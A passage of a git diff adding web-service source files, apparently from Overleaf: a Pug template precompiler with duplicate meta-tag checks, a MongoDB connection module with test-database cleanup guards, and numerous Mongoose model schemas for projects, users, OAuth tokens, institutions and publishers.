duplicates.add(name) + found.add(name) + } + } + // Special case: Ignore the loop for adding permissions meta tags. + duplicates.delete('ol-cannot-') + return { found: Array.from(found), duplicates: Array.from(duplicates) } +} + +/** + * @param {string} filePath + * @param {string} firstLine + * @return {boolean} + * @private + */ +function _expectMetaFor(filePath, firstLine) { + // no-js pages have no use for ol-meta tags + if (firstLine.match(/extends .*layout\/layout-no-js/)) return false + // plain html pages have no use for ol-meta tags + if (firstLine === 'doctype html') return false + // xml pages do not use meta tags + if (firstLine === 'doctype xml') return false + // view includes should not add meta tags as we cannot trace these easily. + if (Object.values(Settings.viewIncludes).flat().includes(filePath)) { + if ( + filePath === Path.resolve('modules/writefull/app/views/_editor_meta.pug') + ) { + // Special case: The Writefull module adds meta tags to editor, see inline comment there + return true + } + // default case: no meta tags + return false + } + // default to expect meta tags in top-level templates + return true +} + +/** + * @param {string} filePath + * @param {string} compiled + */ +function checkForDuplicateMeta(filePath, compiled) { + const { found, duplicates } = _findAllMetaTags(compiled) + + if (duplicates.length !== 0) { + throw new Error( + `Found duplicate meta tags in ${filePath} (or it's imports): ${Array.from(duplicates)}` + ) + } + const firstLine = fs.readFileSync(filePath, 'utf-8').split('\n', 1)[0] + const expectNoMeta = _expectMetaFor(filePath, firstLine) + if (found.length === 0 && expectNoMeta) { + throw new Error( + `Expected to find meta entries in ${filePath} (or it's imports)` + ) + } + if (!expectNoMeta && found.length !== 0) { + throw new Error( + `Expected to find no meta entries in plain html or 'viewIncludes'. Found ${Array.from(found)} in ${filePath} (or it's imports)` + ) + } +} + +function precompileViewsAndCacheToDisk() { + const startTime = Date.now() + let success = 0 + let precompiled = 0 + for (const filePath of buildViewList()) { + const precompiledFilename = filePath.replace(/\.pug$/, '.js') + try { + const compiled = pug.compileFileClient(filePath, PUG_COMPILE_ARGUMENTS) + try { + if (fs.readFileSync(precompiledFilename, 'utf-8') === compiled) { + precompiled++ + continue + } + } catch {} + checkForDuplicateMeta(filePath, compiled) + fs.writeFileSync(precompiledFilename, compiled, { + encoding: 'utf-8', + mode: 0o644, + }) + success++ + } catch (err) { + logger.err({ err, filePath }, 'failed to precompile pug template') + throw err + } + } + logger.info( + { timeTaken: Date.now() - startTime, success, precompiled }, + 'compiled pug templates' + ) +} + +module.exports = { + // for tests + PUG_COMPILE_ARGUMENTS, + _expectMetaFor, + _findAllMetaTags, + + compileViewIncludes(app) { + const viewIncludes = {} + for (const [view, paths] of Object.entries(Settings.viewIncludes)) { + viewIncludes[view] = [] + for (const filePath of paths) { + viewIncludes[view].push( + pug.compileFile(filePath, { + ...PUG_COMPILE_ARGUMENTS, + cache: app.enabled('view cache'), + }) + ) + } + } + return viewIncludes + }, + + precompileViews(app) { + const startTime = Date.now() + let success = 0 + let precompiled = 0 + let failures = 0 + for (const filePath of buildViewList()) { + const precompiledFilename = filePath.replace(/\.pug$/, '.js') + if (fs.existsSync(precompiledFilename)) { + logger.debug({ filePath }, 'loading precompiled pug template') + try { + pug.cache[filePath] = require(precompiledFilename) + precompiled++ + continue + } catch (err) { + logger.error( + { filePath, err }, + 'error loading precompiled pug template' + ) + failures++ + } + } + try { + logger.warn({ filePath }, 'compiling pug template at boot time') + pug.compileFile(filePath, PUG_COMPILE_ARGUMENTS) + success++ + } catch (err) { + logger.error({ filePath, err }, 'error compiling pug template') + failures++ + } + } + logger.debug( + { timeTaken: Date.now() - startTime, failures, success, precompiled }, + 'compiled pug templates' + ) + }, +} + +if (require.main === module) { + precompileViewsAndCacheToDisk() + process.exit(0) +} diff --git a/services/web/app/src/infrastructure/mongodb.js b/services/web/app/src/infrastructure/mongodb.js new file mode 100644 index 0000000..aa7aa4a --- /dev/null +++ b/services/web/app/src/infrastructure/mongodb.js @@ -0,0 +1,143 @@ +const mongodb = require('mongodb-legacy') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const Mongoose = require('./Mongoose') +const { addConnectionDrainer } = require('./GracefulShutdown') + +// Ensure Mongoose is using the same mongodb instance as the mongodb module, +// otherwise we will get multiple versions of the ObjectId class. Mongoose +// patches ObjectId, so loading multiple versions of the mongodb module can +// cause problems with ObjectId comparisons. +if (Mongoose.mongo.ObjectId !== mongodb.ObjectId) { + throw new OError( + 'FATAL ERROR: Mongoose is using a different mongodb instance' + ) +} + +const { ObjectId, ReadPreference } = mongodb + +const READ_PREFERENCE_PRIMARY = ReadPreference.primary.mode +const READ_PREFERENCE_SECONDARY = Settings.mongo.hasSecondaries + ? ReadPreference.secondary.mode + : ReadPreference.secondaryPreferred.mode + +const mongoClient = new mongodb.MongoClient( + Settings.mongo.url, + Settings.mongo.options +) + +addConnectionDrainer('mongodb', async () => { + await mongoClient.close() +}) + +const internalDb = mongoClient.db() +const db = { + contacts: internalDb.collection('contacts'), + deletedFiles: internalDb.collection('deletedFiles'), + deletedProjects: internalDb.collection('deletedProjects'), + deletedSubscriptions: internalDb.collection('deletedSubscriptions'), + deletedUsers: internalDb.collection('deletedUsers'), + dropboxEntities: internalDb.collection('dropboxEntities'), + dropboxProjects: internalDb.collection('dropboxProjects'), + docHistory: internalDb.collection('docHistory'), + docHistoryIndex: internalDb.collection('docHistoryIndex'), + docSnapshots: internalDb.collection('docSnapshots'), + docs: internalDb.collection('docs'), + feedbacks: internalDb.collection('feedbacks'), + githubSyncEntityVersions: internalDb.collection('githubSyncEntityVersions'), + githubSyncProjectStates: internalDb.collection('githubSyncProjectStates'), + githubSyncUserCredentials: internalDb.collection('githubSyncUserCredentials'), + globalMetrics: internalDb.collection('globalMetrics'), + grouppolicies: internalDb.collection('grouppolicies'), + institutions: internalDb.collection('institutions'), + messages: internalDb.collection('messages'), + migrations: internalDb.collection('migrations'), + notifications: internalDb.collection('notifications'), + oauthAccessTokens: internalDb.collection('oauthAccessTokens'), + oauthApplications: internalDb.collection('oauthApplications'), + oauthAuthorizationCodes: internalDb.collection('oauthAuthorizationCodes'), + projectAuditLogEntries: internalDb.collection('projectAuditLogEntries'), + projectHistoryChunks: internalDb.collection('projectHistoryChunks'), + projectHistoryFailures: internalDb.collection('projectHistoryFailures'), + projectHistoryGlobalBlobs: internalDb.collection('projectHistoryGlobalBlobs'), + projectHistoryLabels: internalDb.collection('projectHistoryLabels'), + projectHistoryMetaData: internalDb.collection('projectHistoryMetaData'), + projectHistorySyncState: internalDb.collection('projectHistorySyncState'), + projectInvites: internalDb.collection('projectInvites'), + projects: internalDb.collection('projects'), + publishers: internalDb.collection('publishers'), + rooms: internalDb.collection('rooms'), + samlCache: internalDb.collection('samlCache'), + samlLogs: internalDb.collection('samlLogs'), + spellingPreferences: internalDb.collection('spellingPreferences'), + splittests: internalDb.collection('splittests'), + ssoConfigs: internalDb.collection('ssoConfigs'), + subscriptions: internalDb.collection('subscriptions'), + surveys: internalDb.collection('surveys'), + systemmessages: internalDb.collection('systemmessages'), + tags: internalDb.collection('tags'), + teamInvites: internalDb.collection('teamInvites'), + tokens: internalDb.collection('tokens'), + userAuditLogEntries: internalDb.collection('userAuditLogEntries'), + users: internalDb.collection('users'), + onboardingDataCollection: internalDb.collection('onboardingDataCollection'), + scriptLogs: internalDb.collection('scriptLogs'), +} + +const connectionPromise = mongoClient.connect() + +async function getCollectionNames() { + const internalDb = mongoClient.db() + + const collections = await internalDb.collections() + return collections.map(collection => collection.collectionName) +} + +async function cleanupTestDatabase() { + ensureTestDatabase() + const collectionNames = await getCollectionNames() + const collections = [] + for (const name of collectionNames) { + if (name in db && name !== 'migrations') { + collections.push(db[name]) + } + } + await Promise.all(collections.map(coll => coll.deleteMany({}))) +} + +async function dropTestDatabase() { + ensureTestDatabase() + await mongoClient.db().dropDatabase() +} + +function ensureTestDatabase() { + const internalDb = mongoClient.db() + const dbName = internalDb.databaseName + const env = process.env.NODE_ENV + + if (dbName !== 'test-overleaf' || env !== 'test') { + throw new OError( + `Refusing to clear database '${dbName}' in environment '${env}'` + ) + } +} + +/** + * WARNING: Consider using a pre-populated collection from `db` to avoid typos! + */ +async function getCollectionInternal(name) { + const internalDb = mongoClient.db() + return internalDb.collection(name) +} + +module.exports = { + db, + ObjectId, + connectionPromise, + getCollectionNames, + getCollectionInternal, + cleanupTestDatabase, + dropTestDatabase, + READ_PREFERENCE_PRIMARY, + READ_PREFERENCE_SECONDARY, +} diff --git a/services/web/app/src/infrastructure/types.ts b/services/web/app/src/infrastructure/types.ts new file mode 100644 index 0000000..3fc3275 --- /dev/null +++ b/services/web/app/src/infrastructure/types.ts @@ -0,0 +1,8 @@ +export interface HttpPermissionsPolicyRule { + [key: string]: string +} + +export interface HttpPermissionsPolicy { + blocked: [string] + allowed: HttpPermissionsPolicyRule +} diff --git a/services/web/app/src/models/DeletedFile.js b/services/web/app/src/models/DeletedFile.js new file mode 100644 index 0000000..45d30d8 --- /dev/null +++ b/services/web/app/src/models/DeletedFile.js @@ -0,0 +1,21 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const DeletedFileSchema = new Schema( + { + name: String, + projectId: Schema.ObjectId, + created: { + type: Date, + }, + linkedFileData: { type: Schema.Types.Mixed }, + hash: { + type: String, + }, + deletedAt: { type: Date }, + }, + { collection: 'deletedFiles', minimize: false } +) + +exports.DeletedFile = mongoose.model('DeletedFile', DeletedFileSchema) +exports.DeletedFileSchema = DeletedFileSchema diff --git a/services/web/app/src/models/DeletedProject.js b/services/web/app/src/models/DeletedProject.js new file mode 100644 index 0000000..c1f6ce9 --- /dev/null +++ b/services/web/app/src/models/DeletedProject.js @@ -0,0 +1,34 @@ +const mongoose = require('../infrastructure/Mongoose') +const { ProjectSchema } = require('./Project') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const DeleterDataSchema = new Schema({ + deleterId: { type: ObjectId, ref: 'User' }, + deleterIpAddress: { type: String }, + deletedAt: { type: Date }, + deletedProjectId: { type: ObjectId }, + deletedProjectOwnerId: { type: ObjectId, ref: 'User' }, + deletedProjectCollaboratorIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReadOnlyIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReviewerIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReadWriteTokenAccessIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReadOnlyTokenAccessIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReadWriteToken: { type: String }, + deletedProjectReadOnlyToken: { type: String }, + deletedProjectLastUpdatedAt: { type: Date }, + deletedProjectOverleafId: { type: Number }, + deletedProjectOverleafHistoryId: { type: Schema.Types.Mixed }, +}) + +const DeletedProjectSchema = new Schema( + { + deleterData: DeleterDataSchema, + project: ProjectSchema, + }, + { collection: 'deletedProjects', minimize: false } +) + +exports.DeletedProject = mongoose.model('DeletedProject', DeletedProjectSchema) +exports.DeletedProjectSchema = DeletedProjectSchema diff --git a/services/web/app/src/models/DeletedSubscription.js b/services/web/app/src/models/DeletedSubscription.js new file mode 100644 index 0000000..10b649d --- /dev/null +++ b/services/web/app/src/models/DeletedSubscription.js @@ -0,0 +1,34 @@ +const mongoose = require('../infrastructure/Mongoose') +const { SubscriptionSchema } = require('./Subscription') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const DeleterDataSchema = new Schema( + { + deleterId: { type: ObjectId, ref: 'User' }, + deleterIpAddress: { type: String }, + deletedAt: { + type: Date, + default() { + return new Date() + }, + }, + }, + { _id: false } +) + +const DeletedSubscriptionSchema = new Schema( + { + deleterData: DeleterDataSchema, + subscription: SubscriptionSchema, + }, + { collection: 'deletedSubscriptions', minimize: false } +) + +exports.DeletedSubscription = mongoose.model( + 'DeletedSubscription', + DeletedSubscriptionSchema +) + +exports.DeletedSubscriptionSchema = DeletedSubscriptionSchema diff --git a/services/web/app/src/models/DeletedUser.js b/services/web/app/src/models/DeletedUser.js new file mode 100644 index 0000000..5d20f9b --- /dev/null +++ b/services/web/app/src/models/DeletedUser.js @@ -0,0 +1,31 @@ +const mongoose = require('../infrastructure/Mongoose') +const { UserSchema } = require('./User') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const DeleterDataSchema = new Schema({ + deleterId: { type: ObjectId, ref: 'User' }, + deleterIpAddress: { type: String }, + deletedAt: { type: Date }, + deletedUserId: { type: ObjectId }, + deletedUserLastLoggedIn: { type: Date }, + deletedUserSignUpDate: { type: Date }, + deletedUserLoginCount: { type: Number }, + deletedUserReferralId: { type: String }, + deletedUserReferredUsers: [{ type: ObjectId, ref: 'User' }], + deletedUserReferredUserCount: { type: Number }, + deletedUserOverleafId: { type: Number }, +}) + +const DeletedUserSchema = new Schema( + { + deleterData: DeleterDataSchema, + user: UserSchema, + }, + { collection: 'deletedUsers', minimize: false } +) + +exports.DeletedUser = mongoose.model('DeletedUser', DeletedUserSchema) + +exports.DeletedUserSchema = DeletedUserSchema diff --git a/services/web/app/src/models/Doc.js b/services/web/app/src/models/Doc.js new file mode 100644 index 0000000..9f38ac0 --- /dev/null +++ b/services/web/app/src/models/Doc.js @@ -0,0 +1,14 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const DocSchema = new Schema( + { + name: { type: String, default: 'new doc' }, + }, + { minimize: false } +) + +exports.Doc = mongoose.model('Doc', DocSchema) + +exports.DocSchema = DocSchema diff --git a/services/web/app/src/models/DocSnapshot.js b/services/web/app/src/models/DocSnapshot.js new file mode 100644 index 0000000..b851d4a --- /dev/null +++ b/services/web/app/src/models/DocSnapshot.js @@ -0,0 +1,18 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const DocSnapshotSchema = new Schema( + { + project_id: Schema.Types.ObjectId, + doc_id: Schema.Types.ObjectId, + version: Number, + lines: [String], + pathname: String, + ranges: Schema.Types.Mixed, + ts: Date, + }, + { collection: 'docSnapshots', minimize: false } +) + +exports.DocSnapshot = mongoose.model('DocSnapshot', DocSnapshotSchema) diff --git a/services/web/app/src/models/Feedback.js b/services/web/app/src/models/Feedback.js new file mode 100644 index 0000000..8b63821 --- /dev/null +++ b/services/web/app/src/models/Feedback.js @@ -0,0 +1,24 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose +const { ObjectId } = Schema + +const FeedbackSchema = new Schema( + { + userId: { + type: ObjectId, + ref: 'User', + }, + source: String, + createdAt: { + type: Date, + default() { + return new Date() + }, + }, + data: {}, + }, + { minimize: false } +) + +exports.Feedback = mongoose.model('Feedback', FeedbackSchema) +exports.FeedbackSchema = FeedbackSchema diff --git a/services/web/app/src/models/File.js b/services/web/app/src/models/File.js new file mode 100644 index 0000000..5a7c772 --- /dev/null +++ b/services/web/app/src/models/File.js @@ -0,0 +1,27 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const FileSchema = new Schema( + { + name: { + type: String, + default: '', + }, + created: { + type: Date, + default() { + return new Date() + }, + }, + rev: { type: Number, default: 0 }, + linkedFileData: { type: Schema.Types.Mixed }, + hash: { + type: String, + }, + }, + { minimize: false } +) + +exports.File = mongoose.model('File', FileSchema) +exports.FileSchema = FileSchema diff --git a/services/web/app/src/models/Folder.js b/services/web/app/src/models/Folder.js new file mode 100644 index 0000000..52312e9 --- /dev/null +++ b/services/web/app/src/models/Folder.js @@ -0,0 +1,21 @@ +const mongoose = require('../infrastructure/Mongoose') +const { DocSchema } = require('./Doc') +const { FileSchema } = require('./File') + +const { Schema } = mongoose + +const FolderSchema = new Schema( + { + name: { type: String, default: 'new folder' }, + }, + { minimize: false } +) + +FolderSchema.add({ + docs: [DocSchema], + fileRefs: [FileSchema], + folders: [FolderSchema], +}) + +exports.Folder = mongoose.model('Folder', FolderSchema) +exports.FolderSchema = FolderSchema diff --git a/services/web/app/src/models/GlobalMetric.js b/services/web/app/src/models/GlobalMetric.js new file mode 100644 index 0000000..824c147 --- /dev/null +++ b/services/web/app/src/models/GlobalMetric.js @@ -0,0 +1,19 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const GlobalMetricSchema = new Schema( + { + _id: { type: String, required: true }, + value: { + type: Number, + default: 0, + }, + }, + { + collection: 'globalMetrics', + minimize: false, + } +) + +exports.GlobalMetric = mongoose.model('GlobalMetric', GlobalMetricSchema) +exports.GlobalMetricSchema = GlobalMetricSchema diff --git a/services/web/app/src/models/GroupPolicy.js b/services/web/app/src/models/GroupPolicy.js new file mode 100644 index 0000000..e975834 --- /dev/null +++ b/services/web/app/src/models/GroupPolicy.js @@ -0,0 +1,35 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const GroupPolicySchema = new Schema( + { + // User can't delete their own account + userCannotDeleteOwnAccount: Boolean, + + // User can't add a secondary email address, or affiliation + userCannotHaveSecondaryEmail: Boolean, + + // User can't have an active (currently auto-renewing) personal subscription, nor can they start one + userCannotHaveSubscription: Boolean, + + // User can't choose to leave the group subscription they are managed by + userCannotLeaveManagingGroupSubscription: Boolean, + + // User can't have a Google SSO account, nor can they link it to their account + userCannotHaveGoogleSSO: Boolean, + + // User can't have other third-party SSO (e.g. ORCID/IEEE) active on their account, nor can they link it to their account + userCannotHaveOtherThirdPartySSO: Boolean, + + // User can't use any of our AI features, such as the compile-assistant + userCannotUseAIFeatures: Boolean, + + // User can't use the chat feature + userCannotUseChat: Boolean, + }, + { minimize: false } +) + +exports.GroupPolicy = mongoose.model('GroupPolicy', GroupPolicySchema) +exports.GroupPolicySchema = GroupPolicySchema diff --git a/services/web/app/src/models/Institution.js b/services/web/app/src/models/Institution.js new file mode 100644 index 0000000..fd18cf3 --- /dev/null +++ b/services/web/app/src/models/Institution.js @@ -0,0 +1,49 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose +const { ObjectId } = Schema +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const { promisify } = require('@overleaf/promise-utils') +const { fetchJson } = require('@overleaf/fetch-utils') + +const InstitutionSchema = new Schema( + { + v1Id: { type: Number, required: true }, + managerIds: [{ type: ObjectId, ref: 'User' }], + metricsEmail: { + optedOutUserIds: [{ type: ObjectId, ref: 'User' }], + lastSent: { type: Date }, + }, + groupPolicy: { type: ObjectId, ref: 'GroupPolicy' }, + }, + { minimize: false } +) + +// fetch institution's data from v1 API. Errors are ignored +InstitutionSchema.method('fetchV1Data', async function (callback) { + const url = `${settings.apis.v1.url}/universities/list/${this.v1Id}` + try { + const parsedBody = await fetchJson(url) + this.name = parsedBody != null ? parsedBody.name : undefined + this.countryCode = parsedBody != null ? parsedBody.country_code : undefined + this.departments = parsedBody != null ? parsedBody.departments : undefined + this.portalSlug = parsedBody != null ? parsedBody.portal_slug : undefined + this.enterpriseCommons = + parsedBody != null ? parsedBody.enterprise_commons : undefined + } catch (error) { + // log error and carry on without v1 data + logger.err( + { model: 'Institution', v1Id: this.v1Id, error }, + '[fetchV1DataError]' + ) + } + callback(null, this) +}) + +InstitutionSchema.method( + 'fetchV1DataPromise', + promisify(InstitutionSchema.methods.fetchV1Data) +) + +exports.Institution = mongoose.model('Institution', InstitutionSchema) +exports.InstitutionSchema = InstitutionSchema diff --git a/services/web/app/src/models/OauthAccessToken.js b/services/web/app/src/models/OauthAccessToken.js new file mode 100644 index 0000000..8b3dbc8 --- /dev/null +++ b/services/web/app/src/models/OauthAccessToken.js @@ -0,0 +1,32 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const OauthAccessTokenSchema = new Schema( + { + accessToken: String, + accessTokenPartial: String, + type: String, + accessTokenExpiresAt: Date, + oauthApplication_id: { type: ObjectId, ref: 'OauthApplication' }, + refreshToken: String, + refreshTokenExpiresAt: Date, + scope: String, + user_id: { type: ObjectId, ref: 'User' }, + createdAt: { type: Date }, + expiresAt: Date, + lastUsedAt: Date, + }, + { + collection: 'oauthAccessTokens', + minimize: false, + } +) + +exports.OauthAccessToken = mongoose.model( + 'OauthAccessToken', + OauthAccessTokenSchema +) + +exports.OauthAccessTokenSchema = OauthAccessTokenSchema diff --git a/services/web/app/src/models/OauthApplication.js b/services/web/app/src/models/OauthApplication.js new file mode 100644 index 0000000..f02a985 --- /dev/null +++ b/services/web/app/src/models/OauthApplication.js @@ -0,0 +1,25 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const OauthApplicationSchema = new Schema( + { + id: String, + clientSecret: String, + grants: [String], + name: String, + redirectUris: [String], + scopes: [String], + }, + { + collection: 'oauthApplications', + minimize: false, + } +) + +exports.OauthApplication = mongoose.model( + 'OauthApplication', + OauthApplicationSchema +) + +exports.OauthApplicationSchema = OauthApplicationSchema diff --git a/services/web/app/src/models/OauthAuthorizationCode.js b/services/web/app/src/models/OauthAuthorizationCode.js new file mode 100644 index 0000000..6b98223 --- /dev/null +++ b/services/web/app/src/models/OauthAuthorizationCode.js @@ -0,0 +1,28 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const OauthAuthorizationCodeSchema = new Schema( + { + authorizationCode: String, + expiresAt: Date, + oauthApplication_id: { type: ObjectId, ref: 'OauthApplication' }, + redirectUri: String, + scope: String, + user_id: { type: ObjectId, ref: 'User' }, + codeChallenge: String, + codeChallengeMethod: String, + }, + { + collection: 'oauthAuthorizationCodes', + minimize: false, + } +) + +exports.OauthAuthorizationCode = mongoose.model( + 'OauthAuthorizationCode', + OauthAuthorizationCodeSchema +) + +exports.OauthAuthorizationCodeSchema = OauthAuthorizationCodeSchema diff --git a/services/web/app/src/models/OnboardingDataCollection.js b/services/web/app/src/models/OnboardingDataCollection.js new file mode 100644 index 0000000..e0625f7 --- /dev/null +++ b/services/web/app/src/models/OnboardingDataCollection.js @@ -0,0 +1,33 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const OnboardingDataCollectionSchema = new Schema( + { + firstName: { type: String, default: null }, + lastName: { type: String, default: null }, + primaryOccupation: { type: String, default: null }, + usedLatex: { type: String, default: null }, + companyDivisionDepartment: { type: String, default: null }, + companyJobTitle: { type: String, default: null }, + governmentJobTitle: { type: String, default: null }, + institutionName: { type: String, default: null }, + otherJobTitle: { type: String, default: null }, + nonprofitDivisionDepartment: { type: String, default: null }, + nonprofitJobTitle: { type: String, default: null }, + role: { type: String, default: null }, + subjectArea: { type: String, default: null }, + updatedAt: { type: Date, default: Date.now }, + }, + { + collection: 'onboardingDataCollection', + minimize: false, + } +) + +module.exports = { + OnboardingDataCollection: mongoose.model( + 'OnboardingDataCollection', + OnboardingDataCollectionSchema + ), + OnboardingDataCollectionSchema, +} diff --git a/services/web/app/src/models/Project.js b/services/web/app/src/models/Project.js new file mode 100644 index 0000000..8da4b88 --- /dev/null +++ b/services/web/app/src/models/Project.js @@ -0,0 +1,143 @@ +const mongoose = require('../infrastructure/Mongoose') +const _ = require('lodash') +const { FolderSchema } = require('./Folder') +const Errors = require('../Features/Errors/Errors') + +const ConcreteObjectId = mongoose.Types.ObjectId +const { Schema } = mongoose +const { ObjectId } = Schema + +const DeletedDocSchema = new Schema({ + name: String, + deletedAt: { type: Date }, +}) + +const DeletedFileSchema = new Schema({ + name: String, + created: { + type: Date, + }, + linkedFileData: { type: Schema.Types.Mixed }, + hash: { + type: String, + }, + deletedAt: { type: Date }, +}) + +const ProjectSchema = new Schema( + { + name: { type: String, default: 'new project' }, + lastUpdated: { + type: Date, + default() { + return new Date() + }, + }, + lastUpdatedBy: { type: ObjectId, ref: 'User' }, + lastOpened: { type: Date }, + active: { type: Boolean, default: true }, + owner_ref: { type: ObjectId, ref: 'User' }, + collaberator_refs: [{ type: ObjectId, ref: 'User' }], + reviewer_refs: [{ type: ObjectId, ref: 'User' }], + readOnly_refs: [{ type: ObjectId, ref: 'User' }], + pendingEditor_refs: [{ type: ObjectId, ref: 'User' }], + pendingReviewer_refs: [{ type: ObjectId, ref: 'User' }], + rootDoc_id: { type: ObjectId }, + rootFolder: [FolderSchema], + mainBibliographyDoc_id: { type: ObjectId }, + version: { type: Number }, // incremented for every change in the project structure (folders and filenames) + publicAccesLevel: { type: String, default: 'private' }, + compiler: { type: String, default: 'pdflatex' }, + spellCheckLanguage: { type: String, default: 'en' }, + deletedByExternalDataSource: { type: Boolean, default: false }, + description: { type: String, default: '' }, + archived: { type: Schema.Types.Mixed }, + trashed: [{ type: ObjectId, ref: 'User' }], + deletedDocs: [DeletedDocSchema], + deletedFiles: [DeletedFileSchema], + imageName: { type: String }, + brandVariationId: { type: String }, + track_changes: { type: Object }, + tokens: { + readOnly: { + type: String, + index: { + unique: true, + partialFilterExpression: { 'tokens.readOnly': { $exists: true } }, + }, + }, + readAndWrite: { + type: String, + index: { + unique: true, + partialFilterExpression: { 'tokens.readAndWrite': { $exists: true } }, + }, + }, + readAndWritePrefix: { + type: String, + index: { + unique: true, + partialFilterExpression: { + 'tokens.readAndWritePrefix': { $exists: true }, + }, + }, + }, + }, + tokenAccessReadOnly_refs: [{ type: ObjectId, ref: 'User' }], + tokenAccessReadAndWrite_refs: [{ type: ObjectId, ref: 'User' }], + fromV1TemplateId: { type: Number }, + fromV1TemplateVersionId: { type: Number }, + overleaf: { + id: { type: Number }, + imported_at_ver_id: { type: Number }, + token: { type: String }, + read_token: { type: String }, + history: { + id: { type: Schema.Types.Mixed }, + display: { type: Boolean }, + upgradedAt: { type: Date }, + allowDowngrade: { type: Boolean }, + zipFileArchivedInProject: { type: Boolean }, + rangesSupportEnabled: { type: Boolean }, + }, + }, + collabratecUsers: [ + { + user_id: { type: ObjectId, ref: 'User' }, + collabratec_document_id: { type: String }, + collabratec_privategroup_id: { type: String }, + added_at: { + type: Date, + default() { + return new Date() + }, + }, + }, + ], + deferredTpdsFlushCounter: { type: Number }, + }, + { minimize: false } +) + +ProjectSchema.statics.getProject = function (projectOrId, fields, callback) { + if (projectOrId._id != null) { + callback(null, projectOrId) + } else { + try { + // eslint-disable-next-line no-new + new ConcreteObjectId(projectOrId.toString()) + } catch (e) { + return callback(new Errors.NotFoundError(e.message)) + } + this.findById(projectOrId, fields, callback) + } +} + +function applyToAllFilesRecursivly(folder, fun) { + _.forEach(folder.fileRefs, file => fun(file)) + _.forEach(folder.folders, folder => applyToAllFilesRecursivly(folder, fun)) +} +ProjectSchema.statics.applyToAllFilesRecursivly = applyToAllFilesRecursivly + +exports.Project = mongoose.model('Project', ProjectSchema) +exports.ProjectSchema = ProjectSchema diff --git a/services/web/app/src/models/ProjectAuditLogEntry.js b/services/web/app/src/models/ProjectAuditLogEntry.js new file mode 100644 index 0000000..fa13dbc --- /dev/null +++ b/services/web/app/src/models/ProjectAuditLogEntry.js @@ -0,0 +1,23 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const ProjectAuditLogEntrySchema = new Schema( + { + projectId: { type: Schema.Types.ObjectId, index: true }, + operation: { type: String }, + initiatorId: { type: Schema.Types.ObjectId }, + ipAddress: { type: String }, + timestamp: { type: Date, default: Date.now }, + info: { type: Object }, + }, + { + collection: 'projectAuditLogEntries', + minimize: false, + } +) + +exports.ProjectAuditLogEntry = mongoose.model( + 'ProjectAuditLogEntry', + ProjectAuditLogEntrySchema +) +exports.ProjectAuditLogEntrySchema = ProjectAuditLogEntrySchema diff --git a/services/web/app/src/models/ProjectHistoryFailure.js b/services/web/app/src/models/ProjectHistoryFailure.js new file mode 100644 index 0000000..7bfd1a3 --- /dev/null +++ b/services/web/app/src/models/ProjectHistoryFailure.js @@ -0,0 +1,24 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const ProjectHistoryFailureSchema = new Schema( + { + project_id: String, + ts: Date, + queueSize: Number, + error: String, + stack: String, + attempts: Number, + history: Schema.Types.Mixed, + resyncStartedAt: Date, + resyncAttempts: Number, + requestCount: Number, + }, + { collection: 'projectHistoryFailures', minimize: false } +) + +exports.ProjectHistoryFailure = mongoose.model( + 'ProjectHistoryFailure', + ProjectHistoryFailureSchema +) diff --git a/services/web/app/src/models/ProjectInvite.js b/services/web/app/src/models/ProjectInvite.js new file mode 100644 index 0000000..a7bfbad --- /dev/null +++ b/services/web/app/src/models/ProjectInvite.js @@ -0,0 +1,36 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const EXPIRY_IN_SECONDS = 60 * 60 * 24 * 30 + +const ExpiryDate = function () { + const timestamp = new Date() + timestamp.setSeconds(timestamp.getSeconds() + EXPIRY_IN_SECONDS) + return timestamp +} + +const ProjectInviteSchema = new Schema( + { + email: String, + tokenHmac: String, + sendingUserId: ObjectId, + projectId: ObjectId, + privileges: String, + createdAt: { type: Date, default: Date.now }, + expires: { + type: Date, + default: ExpiryDate, + index: { expireAfterSeconds: 10 }, + }, + }, + { + collection: 'projectInvites', + minimize: false, + } +) + +exports.ProjectInvite = mongoose.model('ProjectInvite', ProjectInviteSchema) +exports.ProjectInviteSchema = ProjectInviteSchema +exports.EXPIRY_IN_SECONDS = EXPIRY_IN_SECONDS diff --git a/services/web/app/src/models/Publisher.js b/services/web/app/src/models/Publisher.js new file mode 100644 index 0000000..e9e10e4 --- /dev/null +++ b/services/web/app/src/models/Publisher.js @@ -0,0 +1,50 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose +const { ObjectId } = Schema +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const request = require('request') + +const PublisherSchema = new Schema( + { + slug: { type: String, required: true }, + managerIds: [{ type: ObjectId, ref: 'User' }], + }, + { minimize: false } +) + +// fetch publisher's (brand on v1) data from v1 API. Errors are ignored +PublisherSchema.method('fetchV1Data', function (callback) { + request( + { + baseUrl: settings.apis.v1.url, + url: `/api/v2/brands/${this.slug}`, + method: 'GET', + auth: { + user: settings.apis.v1.user, + pass: settings.apis.v1.pass, + sendImmediately: true, + 